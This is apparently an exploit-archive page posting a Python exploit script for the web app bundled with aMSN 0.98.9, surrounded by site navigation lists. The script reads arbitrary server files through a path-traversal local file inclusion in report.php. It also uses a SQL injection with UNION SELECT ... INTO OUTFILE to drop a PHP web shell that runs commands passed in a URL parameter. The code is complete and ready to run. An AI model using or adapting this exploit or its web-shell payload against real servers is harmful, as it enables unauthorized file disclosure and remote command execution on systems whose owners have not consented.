aMSN 0.98.9 Local File Inclusion / SQL Injection

aMSN 0.98.9 Local File Inclusion / SQL Injection: Posted Oct 14, 2013; Authored by drone; aMSN version 0.98.9 suffers from local file inclusion and remote SQL injection vulnerabilities.; tags | exploit, remote, local, vulnerability, sql injection, file inclusion; MD5 | 799c535c358309c40c005a50d54bffd2; Download | Favorite | Comments (0)

aMSN 0.98.9 Local File Inclusion / SQL Injection

# Exploit Title: aMSN LFI/SQLi
# Date: 10/09/2013
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.amsn-project.net
# Software link: sourceforge.net/projects/amsn/files/amsn/0.98.9/aMSN-0.98.9-tcl85-windows-installer.exe
# Version: 0.98.9
# Fixed in: SVN repositories (r12422)
# Tested on: Ubuntu 12.04 (apparmor disabled)
 
from argparse import ArgumentParser
import urllib2
import string
import random
 
"""
    Preauth LFI and SQLi in the web app packaged with aMSN 0.98.9
"""
 
def lfi(options):
    """ exploit the LFI
    """
    addr = 'http://{0}{1}/bugs/report.php?lang=../../../../../{2}'.format(\
                            options.ip, options.root, options.lfi)
    data = urllib2.urlopen(addr).read().rstrip().split("ERROR")[0]
    print data
 
def run(options):
    """ exploit lfi or sqli
    """
    if options.lfi:
        return lfi(options)
 
    shell = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(5))
    sqli = 'http://{0}{1}/bugs/admin/index.php?show=bug&id='.format(options.ip, options.root)
 
    # ' UNION SELECT '<?php system($_GET['cmd']) ?>,2,3,4,5,6,7,8,9 INTO OUTFILE 'yourshell';-- -
    exploit = '1\'%20UNION%20SELECT%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\',2,3,4,5,6,7,8,9%20'\
              'INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'.format(options.path,shell)
 
    urllib2.urlopen(sqli + exploit)
    print '[!] Shell dropped.  http://%s%s/%s.php?cmd=ls' % (options.ip, options.root, shell)
 
def parse_args():
    parser = ArgumentParser()
    parser.add_argument("-i", help='Server address', action='store', dest='ip', required=True)
    parser.add_argument('-l', help='Local file inclusion', action='store', dest='lfi',
                              metavar='[file]')
    parser.add_argument('-p', help='Path to amsn [/amsn]', action='store', dest='root',
                              default='/amsn')
    parser.add_argument('-w', help='Path to drop shell [/var/www/amsn', dest='path',
                              default='/var/www/amsn')
 
    options = parser.parse_args()
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.root = options.root if options.root[-1] != '/' else options.root[:-1]
    return options
 
if __name__ == "__main__":
    run(parse_args())

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Red Hat 50 files
Ubuntu 43 files
Debian 26 files
HP 11 files
Jing Wang 10 files
Steffen Roesemann 9 files
Benjamin Kunz Mejri 9 files
Mandriva 9 files
Denis Andzakovic 7 files
hadji samir 7 files

File Archives

Systems

AIX (386)
Apple (1,212)
BSD (309)
Cisco (1,522)
Debian (4,648)
Fedora (1,665)
FreeBSD (1,113)
Gentoo (2,980)
HPUX (795)
iOS (63)
iPhone (102)
IRIX (219)
Juniper (66)
Linux (26,720)
Mac OS X (527)
Mandriva (2,901)
NetBSD (245)
OpenBSD (428)
RedHat (4,215)
Slackware (595)
Solaris (1,540)
SUSE (1,440)
Ubuntu (4,052)
UNIX (7,515)
UnixWare (157)
Windows (4,537)
Other

aMSN 0.98.9 Local File Inclusion / SQL Injection

aMSN 0.98.9 Local File Inclusion / SQL Injection

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems

aMSN 0.98.9 Local File Inclusion / SQL Injection

Share This

aMSN 0.98.9 Local File Inclusion / SQL Injection

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems